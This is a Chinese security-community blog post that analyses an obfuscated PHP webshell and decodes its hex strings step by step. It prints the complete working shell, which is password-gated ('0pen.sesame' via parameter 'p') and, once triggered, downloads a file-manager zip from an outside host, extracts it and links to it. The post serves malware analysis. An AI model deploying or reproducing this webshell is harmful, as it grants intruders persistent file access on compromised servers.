一个思路风骚的PHP小马分析

xhys121zero2024-09-12文章来源:SecHub网络安全社区

一个php小马分析

先看一下这个php的马

'''<?php
 if (!defined("AAAGAGA")) define("AAAGAGA", "AAAGAAG");
 $GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747");
 
 if (!defined(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]))) define(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]) , ord(1));
 if (!defined("AAAGGAA")) define("AAAGGAA", "AAAGAGG");
 $GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
 
 if (!defined(pack($GLOBALS[AAAGGAA] {
   0
 }
 , $GLOBALS[AAAGGAA] {
   01
 }))) define(pack($GLOBALS[AAAGGAA] {
   0
 }
 , $GLOBALS[AAAGGAA] {
   01
 }) , pack($GLOBALS[AAAGGAA] {
   0
 }
 , $GLOBALS[AAAGGAA][02]));
 $GLOBALS[AAGAGGA] = explode(pack($GLOBALS[AAAGGAA] {
   0
 }
 , $GLOBALS[AAAGGAA] {
   3
 }) , pack($GLOBALS[AAAGGAA] {
   0
 }
 , $GLOBALS[AAAGGAA][0x4]));
 if (!defined("AAAGGGA")) define("AAAGGGA", "AAAGGAG");
 $GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
 
 if (!$GLOBALS[AAGAGGA] {
   0x1
 }
 (pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   1
 }))) \call_user_func(pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA][02]) , pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   1
 }) , pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   03
 }));
 $GLOBALS[AAGGAAG] = array(
   $_GET
 );
 $AGAAAAG = & $passwd;
 $AGAAAAA = & $ch;
 $AAGGGGG = & $source;
 $AAGGGGA = & $data;
 $AAGGGAG = & $destination;
 $file = & $AAGGGAA;
 $AAGGAGG = & $zip;
 $file_path = & $AAGGAGA;
 $AGAAAAG = isset($GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG) ][pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   4
 }) ]) ? $GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG) ][pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   4
 }) ] : pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA][05]);
 if ($AGAAAAG != pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA][06])) {
   exit;
 }
 $AGAAAAA = curl_init();
 $AAGGGGG = pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   07
 });
 curl_setopt($AGAAAAA, CURLOPT_URL, $AAGGGGG);
 curl_setopt($AGAAAAA, CURLOPT_RETURNTRANSFER, (AAGAGGG * 41 - 2008));
 $AAGGGGA = curl_exec($AGAAAAA);
 curl_close($AGAAAAA);
 $AAGGGAG = pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   0x8
 });
 $AAGGGAA = $GLOBALS[AAGAGGA] {
   02
 }
 ($AAGGGAG, pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA][011]));
 $GLOBALS[AAGAGGA] {
   03
 }
 ($AAGGGAA, $AAGGGGA);
 $GLOBALS[AAGAGGA] {
   0x4
 }
 ($AAGGGAA);
 $AAGGAGG = new ZipArchive();
 if ($AAGGAGG->open(pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA][012])) === true) {
   $AAGGAGG->extractTo(pack($GLOBALS[AAAGGGA] {
     0x0
   }
   , $GLOBALS[AAAGGGA] {
     11
   }));
   $AAGGAGG->close();
 }
 $AAGGAGA = pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   0x8
 });
 if ($GLOBALS[AAGAGGA] {
   05
 }
 ($AAGGAGA)) {
   if ($GLOBALS[AAGAGGA][6]($AAGGAGA)) {
   }
 }
 echo pack($GLOBALS[AAAGGGA] {
   0x0
 }
 , $GLOBALS[AAAGGGA] {
   0xC
 });
 ?>'''

直接看比较长的字符串,看第七行代码

''$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");'''

explode函数

作用为以第一个参数文本分割第二个参数文本为数组

看一个explode函数的示例就懂啦

image20240326193028075.png

这里再将$GLOBALS[AAAGGAA] 数组输出,看看结果

'''
Array
 (
   [0] => H*
   [1] => 41414741474741
   [2] => 41414741474147
   [3] => 7C3A7C2D7C35
   [4] => 7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B
 )
 '''

上方数组再用 echo pack(“H*”,“41414741474741”);

pack函数

pack(string $format, mixed …$values): string

将输入参数打包成 format 格式的二进制字符串。

*pack()* 格式字符

代码 描述
a 以 NUL 字节填充字符串
A 以 SPACE(空格) 填充字符串
h 十六进制字符串,低位在前
H 十六进制字符串,高位在前
c 有符号字符
C 无符号字符
s 有符号短整型(16位,主机字节序)
S 无符号短整型(16位,主机字节序)
n 无符号短整型(16位,大端字节序)
v 无符号短整型(16位,小端字节序)
i 有符号整型(机器相关大小字节序)
I 无符号整型(机器相关大小字节序)
l 有符号长整型(32位,主机字节序)
L 无符号长整型(32位,主机字节序)
N 无符号长整型(32位,大端字节序)
V 无符号长整型(32位,小端字节序)
q 有符号长长整型(64位,主机字节序)
Q 无符号长长整型(64位,主机字节序)
J 无符号长长整型(64位,大端字节序)
P 无符号长长整型(64位,小端字节序)
f 单精度浮点型(机器相关大小)
g 单精度浮点型(机器相关大小,小端字节序)
G 单精度浮点型(机器相关大小,大端字节序)
d 双精度浮点型(机器相关大小)
e 双精度浮点型(机器相关大小,小端字节序)
E 双精度浮点型(机器相关大小,大端字节序)
x NUL 字节
X 回退一字节
Z 以 NUL 字节填充字符串空白
@ NUL 填充到绝对位置

这里就相当于把41414741474741打包输出,方法调试输出一下(第一个参数为上方数组的[0],第二个参数为上方数组中的[1],[2],[3],[4]),分别得到如下内容:

 '''
 [1] =>AAGAGGA
 [2] =>AAGAGAG
 [3] =>|:|-|5
 [4] =>|:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink
 //其中, [3]和[4]的类型等同于上方代码,再进行字符打散为数组得出:
 (
 [0] => 
 [1] => defined
 [2] => fopen
 [3] => fputs
 [4] => fclose
 [5] => is_file
 [6] => unlink
 )
 '''

然后我们继续,来到第33行:

'''
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
'''

用相同的方法,得到数组内容

'''
Array
 (
   [0] => H*
   [1] => 41414747414147
   [2] => 646566696E65
   [3] => 41414747414141
   [4] => 70
   [5] => 
   [6] => 3070656e2e736573616d65
   [7] => 687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970
   [8] => 2E2F6B6F642E7A6970
   [9] => 772B
   [10] => 6B6F642E7A6970
   [11] => 6B6F642F
   [12] => 3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A
 )
 '''

再通过pack函数依次进行解码得到如下信息:

 '''
   [1] =>AAGGAAG
   [2] =>define
   [3] =>AAGGAAA
   [4] =>p
   [5] =>
   [6] =>0pen.sesame
   [7] =>http://static.kodcloud.com/update/download/kodexplorer4.40.zip
   [8] =>./kod.zip
   [9] =>w+
   [10] =>kod.zip
   [11] =>kod/
   [12] =><a href="./kod" target="_blank">执行成功点击进入</a>
   '''

小马作者利用的是可道云的文件管理信息
上面解码出来的[4]为小马连接密码的参数名,[6]为小马连接密码

当传入密码参数后,服务器将会进行可道云文件管理的zip包,并进行解压,解压目录位于小马目录的kod文件夹

image20240326193418598.png

然后返回一个链接

image20240326193432997.png

直接点击即可进入文件管理器

image20240326193507792.png

只能说思路真的很骚